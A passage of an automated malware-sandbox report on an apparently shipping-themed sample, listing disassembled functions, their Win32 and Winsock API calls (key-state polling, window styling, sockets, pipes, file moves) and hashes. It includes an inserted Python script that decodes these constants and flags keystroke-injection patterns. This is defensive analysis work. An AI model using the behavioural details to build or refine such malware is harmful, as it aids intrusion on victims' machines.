                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      • Opcode ID: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                                                                      • Instruction ID: 903f0b1c0a15e235267dc5133c67e7fa48868f69db26e08795fce502499da723
                                                                                      • Opcode Fuzzy Hash: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                                                                      • Instruction Fuzzy Hash: 7151B170A007499FDB11CFA8DC59AEEBBFAEF09301F14415AF956E7291D6309A41CB60
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 000C6C33
                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 000C6C4A
                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 000C6C73
                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,000AAB79,00000000,00000000), ref: 000C6C98
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 000C6CC7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                      • String ID: p]
                                                                                      • API String ID: 3688381893-1923361398
                                                                                      • Opcode ID: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                                                                      • Instruction ID: c3c5ff4a7c6dab513f0d076fdea1f27a5529048c23246c3e689f2f67d8e17045
                                                                                      • Opcode Fuzzy Hash: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                                                                      • Instruction Fuzzy Hash: A741AF35A04104AFEB34CF68CD99FBD7BE5EB09350F14022CF899A72A1C372AD41DA80
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 00049141
                                                                                      • ScreenToClient.USER32(00000000,?), ref: 0004915E
                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00049183
                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                                                                      Strings
                                                                                      • e8f1bc446112c9a4d8f0b4eb569591a0e023dd312824c1c97905eeb71e59803534dfd5c8e832f189001d93511e18da357505614a13b301b84e3e580495d5bec564, xrefs: 00087152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                      • String ID: e8f1bc446112c9a4d8f0b4eb569591a0e023dd312824c1c97905eeb71e59803534dfd5c8e832f189001d93511e18da357505614a13b301b84e3e580495d5bec564
                                                                                      • API String ID: 4210589936-1144659281
                                                                                      • Opcode ID: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                                                                      • Instruction ID: 2a0de4980b91f9966b95d07a71defdbbc539fa17d2fc65c4383eabb26749ffd4
                                                                                      • Opcode Fuzzy Hash: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                                                                      • Instruction Fuzzy Hash: 3741547190851AFBDF15AF68C848BEEB7B4FF05320F204329E469A72E5C7346950CB55
                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052D4B
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00052D53
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052DE1
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00052E0C
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00052E61
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 1170836740-1018135373
                                                                                      • Opcode ID: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                                                                      • Instruction ID: 1e9e557dd8ccd925e56feb4d297d92846c57602b8fae30ac730abbdeca22916c
                                                                                      • Opcode Fuzzy Hash: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                                                                      • Instruction Fuzzy Hash: 3F419634E002099BCF14DF68C845AEFBBF5BF46356F148155ED146B352DB35AA09CBA0
                                                                                      APIs
                                                                                        • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                                                                        • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000B1112
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1121
                                                                                      • WSAGetLastError.WSOCK32 ref: 000B11C9
                                                                                      • closesocket.WSOCK32(00000000), ref: 000B11F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 2675159561-0
                                                                                      • Opcode ID: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                                                                      • Instruction ID: c38a939d079140a84f6df5a2b446483fd668b3fb2530a326c63eca0d53f7595f
                                                                                      • Opcode Fuzzy Hash: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                                                                      • Instruction Fuzzy Hash: DF410331600604AFEB109F18C894FEABBE9EF45324F548559FD19AB292C774ED41CBE0
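As an added example that is not part of the Joe Sandbox report, the Python below parses the "APIs" call-site lines of this listing and decodes the documented Win32 and Winsock constants they pass, so that the GetKeyboardState/SetKeyboardState/PostMessageW pair of functions above read as WM_KEYUP/WM_KEYDOWN for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, the GetAsyncKeyState function as VK_LBUTTON/VK_RBUTTON polling, the SetWindowLongW/SendMessageW/SetWindowPos function as GWL_STYLE/GWL_EXSTYLE, LVM_SETEXTENDEDLISTVIEWSTYLE and SWP_* flags, and the socket() call as AF_INET/SOCK_STREAM/IPPROTO_TCP. It also flags the save-keyboard-state, post-modifier-key-events, restore pattern that a Send()-style keystroke-injection helper produces. The sample block is copied verbatim from the listing; the constant tables are standard SDK values; the GWL mapping assumes the report prints only the low byte of the negative index (000000F0 for -16, 000000EC for -20), which is an assumption about the report's rendering, not a documented fact.

```python
"""Decode Win32/Winsock constants in Joe Sandbox 'APIs' call-site lines.

Added example, not code from the report. Sample lines are copied from the
listing; constant values are documented SDK definitions unless noted.
"""
import re
from typing import Optional

# Documented constants at the call sites in this listing.
WINDOW_MESSAGES = {
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x1036: "LVM_SETEXTENDEDLISTVIEWSTYLE",  # LVM_FIRST (0x1000) + 54
}
VIRTUAL_KEYS = {
    0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON",
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
}
SWP_FLAGS = [
    (0x0001, "SWP_NOSIZE"), (0x0002, "SWP_NOMOVE"),
    (0x0004, "SWP_NOZORDER"), (0x0020, "SWP_FRAMECHANGED"),
]
# GWL_STYLE is -16 and GWL_EXSTYLE is -20. The listing shows 000000F0 and
# 000000EC, so this table keys on the low byte (assumption about rendering).
GWL_INDEX = {0xF0: "GWL_STYLE", 0xEC: "GWL_EXSTYLE"}
SOCKET_ARGS = ({2: "AF_INET"}, {1: "SOCK_STREAM"}, {6: "IPPROTO_TCP"})

# Matches '• Api.MODULE(args), ref: ADDR', with or without an argument list,
# and with or without the 'Part of subcall function XXXX:' prefix.
LINE_RE = re.compile(
    r"(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)


def parse_api_line(line: str) -> Optional[dict]:
    """Split one call-site line into api, module, args and ref.
    Unknown arguments ('?') become None; hex arguments become ints."""
    m = LINE_RE.search(line)
    if not m:
        return None
    args = []
    raw = m.group("args")
    if raw is not None and raw.strip():
        for a in raw.split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def parse_block(text: str) -> list:
    """Parse every call-site line in an 'APIs' block, skipping other lines."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def _arg(call: dict, i: int) -> Optional[int]:
    return call["args"][i] if i < len(call["args"]) else None


def annotate(call: dict) -> str:
    """Render the constants a call site passes as their symbolic names."""
    api, notes = call["api"], []
    if api in ("PostMessageW", "SendMessageW"):
        msg, wparam = _arg(call, 1), _arg(call, 2)
        if msg in WINDOW_MESSAGES:
            notes.append(WINDOW_MESSAGES[msg])
            if msg in (0x0100, 0x0101) and wparam in VIRTUAL_KEYS:
                notes.append(VIRTUAL_KEYS[wparam])  # wParam is the VK code
    elif api == "GetAsyncKeyState" and _arg(call, 0) in VIRTUAL_KEYS:
        notes.append(VIRTUAL_KEYS[_arg(call, 0)])
    elif api == "socket":
        for table, val in zip(SOCKET_ARGS, call["args"]):
            notes.append(table.get(val, "?" if val is None else f"0x{val:X}"))
    elif api == "SetWindowPos":
        flags = _arg(call, 6) or 0
        notes.extend(name for bit, name in SWP_FLAGS if flags & bit)
        rest = flags & ~sum(bit for bit, _ in SWP_FLAGS)
        if rest:
            notes.append(f"0x{rest:X}")
    elif api == "SetWindowLongW" and _arg(call, 1) in GWL_INDEX:
        notes.append(GWL_INDEX[_arg(call, 1)])
    elif api == "StringFromGUID2":
        # A braced GUID string is 38 characters plus the terminating NUL.
        notes.append(f"cchMax={_arg(call, 2)} WCHARs")
    body = ", ".join(notes) if notes else "no decoded constants"
    return f"{api} @ {call['ref']:08X}: {body}"


def posts_modifier_key_events(calls: list) -> bool:
    """True when a block saves and restores the keyboard state and posts
    WM_KEYDOWN/WM_KEYUP for modifier keys to a window, i.e. synthesises
    modifier presses the way a Send()-style keystroke helper does."""
    names = {c["api"] for c in calls}
    if not {"GetKeyboardState", "SetKeyboardState"} <= names:
        return False
    modifiers = {0x10, 0x11, 0x12, 0x5B}
    return any(c["api"] == "PostMessageW" and _arg(c, 1) in (0x100, 0x101)
               and _arg(c, 2) in modifiers for c in calls)


# Copied from the GetParent/GetKeyboardState/PostMessageW function above.
SAMPLE_BLOCK = """\
• GetParent.USER32(?), ref: 0009AEF9
• GetKeyboardState.USER32(?), ref: 0009AF0E
• SetKeyboardState.USER32(?), ref: 0009AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0009AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0009AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0009AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0009B020
"""

if __name__ == "__main__":
    calls = parse_block(SAMPLE_BLOCK)
    for c in calls:
        print(annotate(c))
    print("posts modifier key events:", posts_modifier_key_events(calls))
```

Run against the sample block it prints one decoded line per call site (for example `PostMessageW @ 0009AF9D: WM_KEYUP, VK_SHIFT`) and reports the modifier-key pattern as present; feeding it the socket() or SetWindowPos lines from the other functions above decodes those constants in the same way. The parser only recognises the argument positions of the APIs listed here, so an unlisted API falls through to "no decoded constants" rather than guessing.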
                                                                                      APIs
                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                                                                        • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0009CF45
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0009CF7F
                                                                                      • _wcslen.LIBCMT ref: 0009D005
                                                                                      • _wcslen.LIBCMT ref: 0009D01B
                                                                                      • SHFileOperationW.SHELL32(?), ref: 0009D061
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 3164238972-1173974218
                                                                                      • Opcode ID: a4092acd6574b36e86b78ec00d555fde9eaa22f1660223ec15b4c6ca205666c7
                                                                                      • Instruction ID: 1bf9bec96affcc041397733c8b09d082c3c8390f88500718f4a5f05c53052399
                                                                                      • Opcode Fuzzy Hash: a4092acd6574b36e86b78ec00d555fde9eaa22f1660223ec15b4c6ca205666c7
                                                                                      • Instruction Fuzzy Hash: 90414871D451185FEF52EBA4D991EDEB7F9AF44380F1000E6E509EB142EA34AB48DB50
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C3E35
                                                                                      • IsMenu.USER32(?), ref: 000C3E4A
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000C3E92
                                                                                      • DrawMenuBar.USER32 ref: 000C3EA5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                      • String ID: 0$p]
                                                                                      • API String ID: 3076010158-498393191
                                                                                      • Opcode ID: 4adec491c5c1e39972e6aaee0e866f4219adbb1ff72a8fe399764c8aa0bef2af
                                                                                      • Instruction ID: fc8c26302beca0f162127ae5be3321dfb2a269f05c90d7829acf35bad92e3b8e
                                                                                      • Opcode Fuzzy Hash: 4adec491c5c1e39972e6aaee0e866f4219adbb1ff72a8fe399764c8aa0bef2af
                                                                                      • Instruction Fuzzy Hash: 62411475A11209AFEB20DF50D884EAEBBF9FF49354F04812DE905A7290D734AE45DBA0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097769
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0009778F
• SysAllocString.OLEAUT32(00000000), ref: 00097792
• SysAllocString.OLEAUT32(?), ref: 000977B0
• SysFreeString.OLEAUT32(?), ref: 000977B9
• StringFromGUID2.OLE32(?,?,00000028), ref: 000977DE
• SysAllocString.OLEAUT32(?), ref: 000977EC
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 1c6e54dab2a43d8cbc81993e79c5bf3f47bd41c52533e8ee174faf06fd57bcdf
• Instruction ID: 9c6a1ab7598dfa00514371d9415759930cbe89a353e86a6cb9e8f5d5b9f75743
• Opcode Fuzzy Hash: 1c6e54dab2a43d8cbc81993e79c5bf3f47bd41c52533e8ee174faf06fd57bcdf
• Instruction Fuzzy Hash: 0A21C176608219AFEF10DFE9CC88CBBB3ECEB093647048025FA08DB2A1D674DC419764
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097842
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097868
• SysAllocString.OLEAUT32(00000000), ref: 0009786B
• SysAllocString.OLEAUT32 ref: 0009788C
• SysFreeString.OLEAUT32 ref: 00097895
• StringFromGUID2.OLE32(?,?,00000028), ref: 000978AF
• SysAllocString.OLEAUT32(?), ref: 000978BD
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 6221f0f941d6a29e70c2ae0799af748a79c0dda6d1a6c2ce400dc35c3e7daa7d
• Instruction ID: 3ec5d8334ab16ec2b8fe63b24c959483560347105ae335d51537664b38bfd459
• Opcode Fuzzy Hash: 6221f0f941d6a29e70c2ae0799af748a79c0dda6d1a6c2ce400dc35c3e7daa7d
• Instruction Fuzzy Hash: 6A219D72608204AFEF14AFA8DC88DBB77ECEB093607148125F919CB2A1DA74DC41DB74
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 000A04F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A052E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
• Instruction ID: c31d0442ae92182ce482e477d017adb979fc7b9bc52a6f1e67813b4b16bdfb05
• Opcode Fuzzy Hash: e144bd6d780e7ef6f0fc94277ea3199f98446d3a755097ff66441de1647f0007
• Instruction Fuzzy Hash: C6217E71900709EBEB209FB9DC44E9A7BF4AF46764F204A19F8A1D62E0D7709950CF20
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 000A05C6
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A0601
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
• Instruction ID: 590ca99bbc5f86c3c49170d3cb99760c2994cfaef040392aa4818c8403bdca32
• Opcode Fuzzy Hash: 67cdbf6b46208c2c6ba1758bc2ac29968dd10161cc63a1d17963a569cb3fc2dc
• Instruction Fuzzy Hash: 042135755003099BEB209FA9DC44E9A77E8BF96728F200B19F9A1E72D0D7719960CB50
APIs
  • Part of subcall function 0003600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0003604C
  • Part of subcall function 0003600E: GetStockObject.GDI32(00000011), ref: 00036060
  • Part of subcall function 0003600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0003606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000C4112
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000C411F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000C412A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000C4139
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000C4145
Strings
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
• Instruction ID: 35d41f8b36995bb076711ad51b869363f17d3618c1969f07ed116030ce73e82c
• Opcode Fuzzy Hash: b6d360d942ae8071314a768e4125bc3af8d3de8dfdd1c03914a7a04513614adf
• Instruction Fuzzy Hash: 1F1190B2140219BEFF218F64CC86EEB7F9DFF08798F008111FB58A6050C6769C619BA4
APIs
  • Part of subcall function 0006D7A3: _free.LIBCMT ref: 0006D7CC
• _free.LIBCMT ref: 0006D82D
  • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
  • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
• _free.LIBCMT ref: 0006D838
• _free.LIBCMT ref: 0006D843
• _free.LIBCMT ref: 0006D897
• _free.LIBCMT ref: 0006D8A2
• _free.LIBCMT ref: 0006D8AD
• _free.LIBCMT ref: 0006D8B8
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
• Instruction ID: be38ad5e4142b1e2cb31be17c16b0663645a5ad658ad6024bdd4aee2922864f3
• Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
• Instruction Fuzzy Hash: 57115B71B44B04AADA21BFB0CC47FCF7BDEAF40700F440826B299A6093EA65B5058662
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0009DA74
• LoadStringW.USER32(00000000), ref: 0009DA7B
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0009DA91
• LoadStringW.USER32(00000000), ref: 0009DA98
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0009DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0009DAB9
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
• Instruction ID: b8d2df8cf751f8701105f5fa7ec7718fed04db13dc119f690d02fc3686e6a65b
• Opcode Fuzzy Hash: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
• Instruction Fuzzy Hash: 360162F25002087FFB10ABA4DD89EEB336CE708301F440496F74AE2041EA789E845F75
APIs
• InterlockedExchange.KERNEL32(00EEE568,00EEE568), ref: 000A097B
• EnterCriticalSection.KERNEL32(00EEE548,00000000), ref: 000A098D
• TerminateThread.KERNEL32(00000000,000001F6), ref: 000A099B
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 000A09A9
• CloseHandle.KERNEL32(00000000), ref: 000A09B8
• InterlockedExchange.KERNEL32(00EEE568,000001F6), ref: 000A09C8
• LeaveCriticalSection.KERNEL32(00EEE548), ref: 000A09CF
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
• Instruction ID: f727891f7544705724359d98f1d3c60d17aba02aa6ef717d822668f806153663
• Opcode Fuzzy Hash: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
• Instruction Fuzzy Hash: 72F0EC32442A12BBF7515FA4EE8DFD6BB79FF06702F442025F206908A1C7799565CF90
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 000B1DC0
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000B1DE1
• WSAGetLastError.WSOCK32 ref: 000B1DF2
• htons.WSOCK32(?,?,?,?,?), ref: 000B1EDB
• inet_ntoa.WSOCK32(?), ref: 000B1E8C
  • Part of subcall function 000939E8: _strlen.LIBCMT ref: 000939F2
  • Part of subcall function 000B3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,000AEC0C), ref: 000B3240
• _strlen.LIBCMT ref: 000B1F35
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                      • String ID:
                                                                                      • API String ID: 3203458085-0
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 00035D30
                                                                                      • GetWindowRect.USER32(?,?), ref: 00035D71
                                                                                      • ScreenToClient.USER32(?,?), ref: 00035D99
                                                                                      • GetClientRect.USER32(?,?), ref: 00035ED7
